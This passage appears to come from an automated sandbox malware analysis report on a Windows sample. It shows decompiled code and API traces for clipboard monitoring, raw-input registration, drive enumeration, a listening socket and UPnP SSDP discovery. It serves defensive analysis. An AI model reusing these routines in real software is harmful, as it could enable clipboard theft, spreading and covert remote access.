                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32 ref: 0040420B
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00404260
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004042A7
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32 ref: 004042B9
                                                                                                                                                                                                                                                                                    • RegisterRawInputDevices.USER32 ref: 004043C0
                                                                                                                                                                                                                                                                                    • ChangeClipboardChain.USER32 ref: 004043CE
                                                                                                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 004043E4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d6eb097551fe403484d6df1eea500d8dda5268cf33ca3084c7f7c11ec5fa5c98
                                                                                                                                                                                                                                                                                    • Instruction ID: 12af2944b2afbdd2840b1e0cc58b104c1e1997fab1ca1becb874473cf393234d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6eb097551fe403484d6df1eea500d8dda5268cf33ca3084c7f7c11ec5fa5c98
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 927111B4A00208EFDF14DF94D948BEE77B4AF88305F14856AFA05B72D0D7799A40CB69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E004054A0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                                                    				short _v556;
                                                                                                                                                                                                                                                                                    				short _v2604;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2608;
                                                                                                                                                                                                                                                                                    				union _ULARGE_INTEGER _v2612;
                                                                                                                                                                                                                                                                                    				long _v2616;
                                                                                                                                                                                                                                                                                    				short _v3148;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3152;
                                                                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				struct %anon54 _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				GetModuleFileNameW(0, 0x4163c0, 0x104);
                                                                                                                                                                                                                                                                                    				_t34 = E0040D180(0x4163c0);
                                                                                                                                                                                                                                                                                    				_t69 = _t68 + 4;
                                                                                                                                                                                                                                                                                    				 *0x4163b8 = _t34;
                                                                                                                                                                                                                                                                                    				while(1 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = E00404CB0();
                                                                                                                                                                                                                                                                                    					_v12 = 2;
                                                                                                                                                                                                                                                                                    					while(_v12 <= 0x19) {
                                                                                                                                                                                                                                                                                    						_t38 = E00404C50(_v8, _v12,  &_v24);
                                                                                                                                                                                                                                                                                    						_t69 = _t69 + 0xc;
                                                                                                                                                                                                                                                                                    						_v16 = _t38;
                                                                                                                                                                                                                                                                                    						_v3152 = _v16;
                                                                                                                                                                                                                                                                                    						if(_v3152 == 2 || _v3152 == 4) {
                                                                                                                                                                                                                                                                                    							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                                                                                                                                                                                                                    							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(0x40000000);
                                                                                                                                                                                                                                                                                    							_t63 = _v2608;
                                                                                                                                                                                                                                                                                    							_push(_t63);
                                                                                                                                                                                                                                                                                    							_t43 = _v2612.LowPart;
                                                                                                                                                                                                                                                                                    							_push(_t43);
                                                                                                                                                                                                                                                                                    							L0040EE10();
                                                                                                                                                                                                                                                                                    							_push(_t63);
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                                                                                                                                                                                                                    							_t70 = _t69 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_v3148 & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                                    								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                                                                                                                                                                                                                    								_t70 = _t70 + 8;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                                                                                                                                                                                                                    							E00404FC0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                                                                                                                                                                                                                    							_t69 = _t70 + 0x20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				ExitThread(0);
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    0x004054ae
                                                                                                                                                                                                                                                                                    0x004054c0
                                                                                                                                                                                                                                                                                    0x004054cb
                                                                                                                                                                                                                                                                                    0x004054d0
                                                                                                                                                                                                                                                                                    0x004054d3
                                                                                                                                                                                                                                                                                    0x004054d8
                                                                                                                                                                                                                                                                                    0x004054ea
                                                                                                                                                                                                                                                                                    0x004054ed
                                                                                                                                                                                                                                                                                    0x004054ff
                                                                                                                                                                                                                                                                                    0x00405515
                                                                                                                                                                                                                                                                                    0x0040551a
                                                                                                                                                                                                                                                                                    0x0040551d
                                                                                                                                                                                                                                                                                    0x00405523
                                                                                                                                                                                                                                                                                    0x00405530
                                                                                                                                                                                                                                                                                    0x0040555f
                                                                                                                                                                                                                                                                                    0x00405574
                                                                                                                                                                                                                                                                                    0x0040557a
                                                                                                                                                                                                                                                                                    0x0040557c
                                                                                                                                                                                                                                                                                    0x00405581
                                                                                                                                                                                                                                                                                    0x00405587
                                                                                                                                                                                                                                                                                    0x00405588
                                                                                                                                                                                                                                                                                    0x0040558e
                                                                                                                                                                                                                                                                                    0x0040558f
                                                                                                                                                                                                                                                                                    0x00405594
                                                                                                                                                                                                                                                                                    0x004055a2
                                                                                                                                                                                                                                                                                    0x004055a8
                                                                                                                                                                                                                                                                                    0x004055b4
                                                                                                                                                                                                                                                                                    0x004055c2
                                                                                                                                                                                                                                                                                    0x004055c8
                                                                                                                                                                                                                                                                                    0x004055c8
                                                                                                                                                                                                                                                                                    0x004055e5
                                                                                                                                                                                                                                                                                    0x0040560b
                                                                                                                                                                                                                                                                                    0x00405610
                                                                                                                                                                                                                                                                                    0x00405610
                                                                                                                                                                                                                                                                                    0x004054fc
                                                                                                                                                                                                                                                                                    0x004054fc
                                                                                                                                                                                                                                                                                    0x0040561d
                                                                                                                                                                                                                                                                                    0x0040561d
                                                                                                                                                                                                                                                                                    0x0040562a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004054AE
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004163C0,00000104), ref: 004054C0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: CreateFileW.KERNEL32(004054D0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040D1A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D1B5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: CloseHandle.KERNEL32(000000FF), ref: 0040D1C2
                                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0040562A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: GetLogicalDrives.KERNEL32 ref: 00404CB6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegOpenKeyExW.ADVAPI32 ref: 00404D04
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404D31
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegCloseKey.ADVAPI32(?), ref: 00404D4E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040561D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404C50: lstrcpyW.KERNEL32(?,?), ref: 00404CA3
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32 ref: 0040555F
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405574
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040558F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055A2
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055C2
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055E5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                                                    • Opcode ID: 325e993603c8bda3392c0f0bd153b9b3ac43164d3fc352dd12edcd88a3ba2bb9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9bd4fa2fb620ac2810ea8b244f600aa7f59dc27fdf478d4548bf3fce0c8904cf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 325e993603c8bda3392c0f0bd153b9b3ac43164d3fc352dd12edcd88a3ba2bb9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D418371900208BBE714DB94DC45FEE7778AB48700F1085AAF209B61D0DA799B84CF6A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                                                                                                                                                    			E0040EB00(void* __esi) {
                                                                                                                                                                                                                                                                                    				struct _SYSTEM_INFO _v36;
                                                                                                                                                                                                                                                                                    				short _v40;
                                                                                                                                                                                                                                                                                    				char _v77;
                                                                                                                                                                                                                                                                                    				short _v82;
                                                                                                                                                                                                                                                                                    				short _v86;
                                                                                                                                                                                                                                                                                    				short _v90;
                                                                                                                                                                                                                                                                                    				short _v92;
                                                                                                                                                                                                                                                                                    				short _v94;
                                                                                                                                                                                                                                                                                    				short _v96;
                                                                                                                                                                                                                                                                                    				short _v98;
                                                                                                                                                                                                                                                                                    				char _v100;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                                                                    				short _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 = E00408B00(0x4c);
                                                                                                                                                                                                                                                                                    				_t54 = _t30;
                                                                                                                                                                                                                                                                                    				_t59 = _t58 + 4;
                                                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    					return _t30;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *_t54 = 0x494f4350;
                                                                                                                                                                                                                                                                                    					GetSystemInfo( &_v36);
                                                                                                                                                                                                                                                                                    					_t45 = _v36.dwNumberOfProcessors;
                                                                                                                                                                                                                                                                                    					_t3 = _t54 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                                                                                                                                                                                                                    					InitializeCriticalSection(_t3);
                                                                                                                                                                                                                                                                                    					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 0x10) = _t33;
                                                                                                                                                                                                                                                                                    					if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                                                                    						E0040E0E0(_t54);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 8) = _t36;
                                                                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t37 = E0040BAF0(_t45);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                                                                                                                                                                                                                    					if(_t37 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v77 = 1;
                                                                                                                                                                                                                                                                                    					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                                                                                                                                                                                                                    					_v94 = 0;
                                                                                                                                                                                                                                                                                    					_v90 = 0;
                                                                                                                                                                                                                                                                                    					_v86 = 0;
                                                                                                                                                                                                                                                                                    					_v82 = 0;
                                                                                                                                                                                                                                                                                    					_t39 = _v40;
                                                                                                                                                                                                                                                                                    					_v96 = 2;
                                                                                                                                                                                                                                                                                    					_v92 = _t39;
                                                                                                                                                                                                                                                                                    					__imp__#9(_v36.dwOemId);
                                                                                                                                                                                                                                                                                    					_v98 = _t39;
                                                                                                                                                                                                                                                                                    					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                                                                                                                                                                                                                    					__imp__#2(_t40,  &_v100, 0x10);
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSACreateEvent();
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                                                                                                                                                                                                                    					if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                                                                                                                                                                                                                    					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t56 = 0;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							E0040BBA0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EA30, _t54, 0, 0);
                                                                                                                                                                                                                                                                                    							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                                    							_t59 = _t59 + 0x18;
                                                                                                                                                                                                                                                                                    						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040BBA0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E400, _t54, 0, 0);
                                                                                                                                                                                                                                                                                    					return _t54;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                                                                    0x0040eb06
                                                                                                                                                                                                                                                                                    0x0040eb0b
                                                                                                                                                                                                                                                                                    0x0040eb0d
                                                                                                                                                                                                                                                                                    0x0040eb12
                                                                                                                                                                                                                                                                                    0x0040ec8a
                                                                                                                                                                                                                                                                                    0x0040eb18
                                                                                                                                                                                                                                                                                    0x0040eb1d
                                                                                                                                                                                                                                                                                    0x0040eb23
                                                                                                                                                                                                                                                                                    0x0040eb29
                                                                                                                                                                                                                                                                                    0x0040eb2d
                                                                                                                                                                                                                                                                                    0x0040eb34
                                                                                                                                                                                                                                                                                    0x0040eb37
                                                                                                                                                                                                                                                                                    0x0040eb45
                                                                                                                                                                                                                                                                                    0x0040eb4b
                                                                                                                                                                                                                                                                                    0x0040eb50
                                                                                                                                                                                                                                                                                    0x0040ec7f
                                                                                                                                                                                                                                                                                    0x0040ec7f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec84
                                                                                                                                                                                                                                                                                    0x0040eb5e
                                                                                                                                                                                                                                                                                    0x0040eb64
                                                                                                                                                                                                                                                                                    0x0040eb69
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040eb6f
                                                                                                                                                                                                                                                                                    0x0040eb74
                                                                                                                                                                                                                                                                                    0x0040eb79
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040eb8b
                                                                                                                                                                                                                                                                                    0x0040eb91
                                                                                                                                                                                                                                                                                    0x0040eb97
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ebac
                                                                                                                                                                                                                                                                                    0x0040ebb1
                                                                                                                                                                                                                                                                                    0x0040ebbd
                                                                                                                                                                                                                                                                                    0x0040ebc1
                                                                                                                                                                                                                                                                                    0x0040ebc5
                                                                                                                                                                                                                                                                                    0x0040ebc9
                                                                                                                                                                                                                                                                                    0x0040ebce
                                                                                                                                                                                                                                                                                    0x0040ebd8
                                                                                                                                                                                                                                                                                    0x0040ebdd
                                                                                                                                                                                                                                                                                    0x0040ebe1
                                                                                                                                                                                                                                                                                    0x0040ebed
                                                                                                                                                                                                                                                                                    0x0040ebf2
                                                                                                                                                                                                                                                                                    0x0040ebf7
                                                                                                                                                                                                                                                                                    0x0040ec00
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec0f
                                                                                                                                                                                                                                                                                    0x0040ec18
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec1a
                                                                                                                                                                                                                                                                                    0x0040ec20
                                                                                                                                                                                                                                                                                    0x0040ec25
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec2e
                                                                                                                                                                                                                                                                                    0x0040ec37
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ec3a
                                                                                                                                                                                                                                                                                    0x0040ec3f
                                                                                                                                                                                                                                                                                    0x0040ec41
                                                                                                                                                                                                                                                                                    0x0040ec51
                                                                                                                                                                                                                                                                                    0x0040ec56
                                                                                                                                                                                                                                                                                    0x0040ec57
                                                                                                                                                                                                                                                                                    0x0040ec5a
                                                                                                                                                                                                                                                                                    0x0040ec41
                                                                                                                                                                                                                                                                                    0x0040ec6f
                                                                                                                                                                                                                                                                                    0x0040ec7e
                                                                                                                                                                                                                                                                                    0x0040ec7e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 0040EB23
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EB37
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EB45
                                                                                                                                                                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EB5E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BAF0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BB0E
                                                                                                                                                                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EB8B
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 0040EBB1
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0040EBE1
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,00000004,00000010), ref: 0040EBF7
                                                                                                                                                                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040EC0F
                                                                                                                                                                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040EC1A
                                                                                                                                                                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EC2E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BBC4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040BC1F
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040BC5C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040BC67
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: DuplicateHandle.KERNEL32 ref: 0040BC6E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BBA0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040BC82
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f5c8a733228a7b3742c1c3b1f999116d73948f9746cd990c91c1e4c648286908
                                                                                                                                                                                                                                                                                    • Instruction ID: 55e3d3791406c7558891e3ce563330e9b7b343d865a5bfb51454dd4e2dcce5d3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5c8a733228a7b3742c1c3b1f999116d73948f9746cd990c91c1e4c648286908
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65419270644302BBE3209F758C4AF46B7A5BF44710F108A2AF568E62D0E7B5E454CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040C59A
                                                                                                                                                                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040C5D0
                                                                                                                                                                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040C5DF
                                                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C5FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: htons.WS2_32(00000050), ref: 0040956D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: socket.WS2_32(00000002,00000001,00000000), ref: 0040958D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: connect.WS2_32(000000FF,?,00000010), ref: 004095A6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409540: getsockname.WS2_32(000000FF,?,00000010), ref: 004095D8
                                                                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040C633
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00410578,00000000,?,00000010), ref: 0040C64C
                                                                                                                                                                                                                                                                                    • sendto.WS2_32(000000FF,00410578,00000000), ref: 0040C65B
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C675
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C4DE
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: Sleep.KERNEL32(000003E8), ref: 0040C4EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C50B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C521
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C490: StrChrA.SHLWAPI(?,0000000D), ref: 0040C54E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
